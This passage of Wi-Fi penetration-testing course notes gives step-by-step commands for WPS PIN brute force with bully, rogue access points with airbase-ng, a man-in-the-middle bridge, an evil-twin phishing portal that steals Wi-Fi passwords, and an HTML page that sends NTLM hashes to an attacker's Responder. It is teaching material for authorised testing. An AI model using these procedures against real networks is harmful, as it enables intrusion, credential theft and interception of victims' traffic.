  • This behavior, combined with the split PIN allows us to build a quite optimized brute force attack

There are two tools that can help you exploit this vulnerability:

Reaver
Bully

Reaver

Reaver-WPS

  • Reaver also comes with a secondary tool called wash that can be used to find vulnerable APs.

Bully

Bully

  • It has some advantages over Reaver such as fewer dependencies and a build process optimized For embedded devices.

Attack

With your monitor interface Up and Running, launch:

wash -i <interface>

Wash will start hopping though the wireless channels and will list discovered APs that support WPS.

  • Wash output also offers other useful information. Apart from signal level (RSSI column), you can find the WPS Locked column.
  • IF the cell value is YES, you will find that the corresponding AP disabled WPS due to internal anti_bruteforce protection mechanisms.
  • This is a major limitation of the WPS attack

Once you are sure your target AP is vulnerable to the attack, you can launch bully with the following command:

bully -b <BSSID> <interface>
  • BSSID is the target APs MAC address
  • Bully will start trying every possible PIN in a randomized order.
  • You will probably need a few hours to complete the attack and get the WPA/WPA2 key back

You can disable lockout detection in bully and force it to continue the attack, but this is not recommended.

bully -b <BSSID> -L <interface>
  • A better option to avoid being locked out is to add a certain delay after every PIN attempt.

By adding a pause between each try, you could bypass the attack detection system and get a smoother bruteforce attack.

bully -b <BSSID> -1 <seconds> -2 <seconds> <interface>
  • -1 = the delay of the first phase of the attack (first half of the PIN)
  • -2 = the delay value of the second phase.
  • Values of 60 seconds or more are recommended For most APs.

Wi-Fi as Attack Vector

Module Map:

Rogue AP

Wardriving

Rogue AP

  • Imagine being able to set up a Free WIFI Access Point and to control all of the communications through it. What could you do when a client actually connects?
  • As you are in control of the packet flow, you could launch all of your favorite attacks you have learned to apply in the wired word such as: MitM, ARP poisoning, traffic sniffing or even browser vulnerabilties.
  • Tool we are gonna use airbase-ng

Features:

 → Implementations of the Caffe-Latte and Hirte attacks
 → Act as ad-hoc or infrastructure AP
 → Encrypt and decrypt traffic
 → Can capture WPA/WPA2 handshakes
 → Packet manipulation with external commands
 → Filtering by BSSID or client MAC
  • The object of the attack if getting the users notebook to connect to the fake AP
  • You will be able to recover a good amount of keystream (generally 140 bytes) which is more than what you need to forge your own ARP requests with packetforge

Recover PRGA with a Rogue AP

Setup:

	A victim client unassociated from any AP
	Our attacking machine **Fake AP**

Put your wireless adapter into monitor mode:

airmon-ng start <interface>

Launch airodump to dump the incoming keystream to a file For later use:

airodump-ng -c <channel> -w <outfile> <interface>

Launch airbase:

airbase-ng -c <channel> -e <SSID> -s -W 1 <interface>
  • set the SSID to be the one you are spoofing
  • -s = will force the client to authenticate using the SKA method
  • -W 1 = set the WEP bit in the beacons as some clients can get confused otherwise

  • We should get a keystream and a victim connect to the fake AP
  • in the airodump tab we can see that a SKA handshake was captured and saved in a .xor file.

Its possible to let airbase itself save all the captured information to a file instead of using an external command.

airbase-ng -c <channel> -e <SSID> -s -E 1 -F <file> <interface>
  • just add the -F option

What was achieved with this attack:

  • The victim client was tricked into connecting to our spoofed AP and as Shared Authentication was set, we were able to recover a good amount of keystream that we could later re-use to launch further attacks against the client or the AP as we learned in previous modules.

Initiate a WPA/WPA2 Handshake

Launch airbase:

airbase-ng -c <channel> -e <SSID> -W 1 -Z 4 <interface>
  • -Z = used to specify WPA2 options while 4 stands For CCMP encryption scheme.

As before, the victim client is tricked into connection to the spoofed AP and we are able to connect the WPA2 handshake

in the airodump tab we can see that the handshake took place We were able to get a real handshake without knowing the network PSK

  • As you recall in the first message of the 4-way handshake, the AP sends an ANonce to the authenticating client which in turn sends its SNonce plus the MIC. Now the AP has all of the needed information to actually try to crack the PSK; the subsequent steps in the handshake are not even needed.

Rogue AP: an Alternative definition

Alternative to Rogue AP:

  • its an unmanaged and unauthorized wireless AP attached to an enterprise wireless network.
  • Rogues APs represent a major security threat as they create a wireless backdoor on the internal wired network that bypasses all of the perimeter defenses like firewalls and IDS.
  • A typical example of Rogue AP is the one set up by an exployee willing to share the company Internet connection with mobile devices or the same employee could bring an AP to connect to from its laptop and bypass internal security policies just to be able to surf social network websites.
  • In the simplest case, the attacker can passively scan the wireless medium to collect information about network configuration hostnames and IPs.
  • Sensitive information could also be disclosed such as usernames, passwords or emails (especially if the wireless network uses no encryption)

Main in the Middle attack

  • setup

→ A victim client unassociated from any AP

→ The attacker machine should be connected to the internet through a wired interface

  • Steps of the attack:

→ Set up a fake AP

→ Start a DHCP server to provide the network configuration to connecting clients

→ Forward all the traffic toward the Internet but..

→ Act as MitM eavesdropping all the communications

Wireless interface into monitor mode:

airmon-ng start <interface>

Start airbase and set up an AP which a catchy SSID name like Free Internet

airbase-ng -c <channel> -e "Free Internet" <interface>

Create a network bridge interface:

brctl addbr br0
brctl addif br0 eth0
brctl addif br0 at0
  • br0 = name of the bridge interface
  • eth0 = your wired interface
  • at0 = the virtual interface created by airbase

Troubleshooting: brctl - command not found

apt-get install bridge-utils

Assign an IP address to the bridge interface:

ifconfig br0 <ip_address> up

the IP depends on your network config

Enable IP packet forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward
  • Try to connect from your victim client through the new Free Internet AP.

At this point, all of the internet directed traffic from the victim client is already being forwarded through the attack machine.

  • Try to browser a website from your victim client.
  • Also confirm your attack machine can connect to the internet

Now we can fire up your favorite sniffing tool and start listening on your virtual wireless interface:

tcpdump -nvi <interface> tcp port 80 -A

now you can test, log in some account with the victim browser

You could:

 → redirect DNS requests
 → Change web page content
 → harvest user information
 → inject browser-specific payloads to exploit browser vulnerabilities
 → and so on.

Rogue AP: Evil Twin Attack

Wireless Networks Wikipedia

  • Similar to Rogue AP, with Evil Twin we combine with a bit of social engineering to obtain a WPA2 networks Pre-shared key without the need to conduct a cryptographic attack against the WPA2 protocol itself.

Setup:

1. Replicate a known AP ESSID via creation of an AP with hostapd
2. De-authenticate a station that is associated to the **real** AP
3. Station reconnects to **Evil Twin** AP
4. The user, upon launching a browser is presented with a web page over HTTP requesting SSID For an **important Firmware Upgrade**
5. We receive the SSID in plain-text via the hTTP page
  • A tool we can use to conduct this type of attack is Mana
  • Mana Github

  • Mana allows us to quickly spin up a rogue access point, configure the necessary DHCP settings, and with some modifications to the default configuration, we can host our own web page to be served to a connected station.

To the attack be successful, the attacker AP should be in close proximity to a station already connected to the legitimate AP.

  • This way, upon de-authentication of the client, the client should auto-reconnect to the AP with the stronger signal (the attacker-controlled AP)

  • We need 2 wireless adapters

Active monitor mode in the first one:

airmon-ng start wlan0

Monitor the new monitor interface:

airodump-ng wlan0mon --essid <target SSID> --manufacturer

Stop the mon interface and up the wlan0, so we can use later:

airmon-ng stop wlan0mon
ifconfig wlan0 up

Install mana toolkit:

apt install mana-toolkit
cd /usr/share/mana-toolkit/
cd /run-mana
analyse the start-noupstream.sh code

Go to /usr/share/mana-toolkit/hostapd-mana.conf:

 → change ssid = Free-Internet or whatever
 → change channel = to the same as the target

Go back to the start-noupstream.sh code:

 → change the line: dnsmasq -C ... -i $phy // must add the -i
 → comment the line below: # dnsspoof ...
 → comment the line 30: # msfconsole ...
  • in another tab

Open metasploit:

msfconsole
use auxiliary/server/fakedns
options
set targetaction FAKE
set targetdomain *
set targethost 10.0.0.1
exploit -j
  • copy the html phishing page to /use/share/mana-toolkit/www/portal

Start the payload start-noupstream.sh

./start-noupstream.sh

Start the second interface to monitor mode:

airmon-ng start wlan1
airodump-ng wlan1mon --essid <name of SSID> --channel 6 (of the target)

Now we need to deauth the target from the legit network to log in ours malicious one:

aireplay-ng --deauth 25 wlan1mon -b <BSSID> -c <SSID> -e <name of network> 
  • bssid = mac of the target AP
  • ssid = mac of the target station
  • -e = name of the network

  • now that the victim enter in our malicious network
  • when they open the browser, it will automatically open the phishing page
  • that we can get their password of their WiFi

After they insert the password we can grab from

tail -f /var/log/apache2/access.log
  • now we can access their WiFi and continue the pentest

with Responder + MANA

Execute the payload:

./start-noupstream.sh
  • in another tab

Put the second interface in monitor mode:

airmon-ng start wlan1
airodump-ng wlan1mon -essid <name of network> --channel <same of the target>

Metasploit fake dns:

use auxiliary/server/fakedns
set targetaction FAKE
set targetdomain *
set targethost 10.0.0.1
exploit -j

Create a simple html page:


<html>
<img src="file://///10.0.0.1/share" width="0" height="0"></img>
<img src="\\10.0.0.1\share" width="0" height="0"></img>
</html>

  • copy the page to /usr/share/mana-toolkit/www/portal/

Start responder and verify if its listening in our first interface wlan0:

cd /usr/share/responder
python Responder.py -I wlan0

we can ignore the dns error, because we are using the port 53 in the metasploit fake dns

Deauthenticate:

aireplay-ng --deauth 25 wlan1mon -b <bssid> -c <ssid> -e <network name>
  • thats it

For learning purposes, we can go to the target pc and start the browser

it will automatically send the NTLM/NTLMv2 hashes to the responder tab

Attacks against WPA2-Enterprise

  • WPA2-Enterprise introduced several improvements to the WPA2-PSK model in regards of security.
  • In the traditional WPA2-PSK model, we have a client (supplicant) that connects to an AP (authenticator), the usual two-party scenario
  • With WPA2-Enterprise, we introduce a third-party Authentication Server, which is usually a system that supports the RADIUS and Extensible Authentication (EAP) protocols.

Eaphammer

  • There are several tools that can aid with attacks against WPA2-Enterprise networks
  • Eaphammer - EaPhamer Github
  • Aside from being able to automate EvilTwin attacks similar to the previously mentioned Mana toolkit
  • Eaphammer allows us to steal RADIUS credentials, conduct hostile portal attacks to steal Active Directory credentials (through Response-Type attacks), and includes a host of other features we will find useful during wireless pentest engagements:
 → built-in Responder integration
 → Support For Open networks and WPA-EAP/WPA2-EAP
 → No manual configuration necessary For most attacks
 → No manual configuration necessary For instalattion and setup process
 → Leverages latest version of hostapd (2.6)
 → Support For Evil Twin and Karma Attacks
 → Generate timed Powershell payloads For indirect wireless pivots
 → Integrated HTTP server For Hostile Portal attacks
 → Support For SSID cloaking

Wardriving

  • Is the act of searching For Wi-Fi networks by a person on a moving vehicle using a portable computer, a smartphone or any other wi-fi enabled device.
  • The main objective of wardriving is creating a map of Wi-Fi Access Points in a specific area
  • The map can then be used to observe AP distribution and characteristics like SSID names or encryption type

To start wardriving u need:

- A good GPS receiver
- A Wi-Fi enabled device
- A vehicle
  • A good free app that you can use For both android and IOS

Net.Wigle PlayStore

→ WiGLE.net = Wigle.net

The website that collects all the user uploaded information and build constantly updated maps of Wi-Fi access points around the world.

After the drive, we used an app functionality which allows one to export the database of founds APs in KML: a format used by Google Earth

  • a red pin stands For a strongly encrypted network (WPA/WPA2)
  • a yellow one represents a WEP network
  • a green stands For a open AP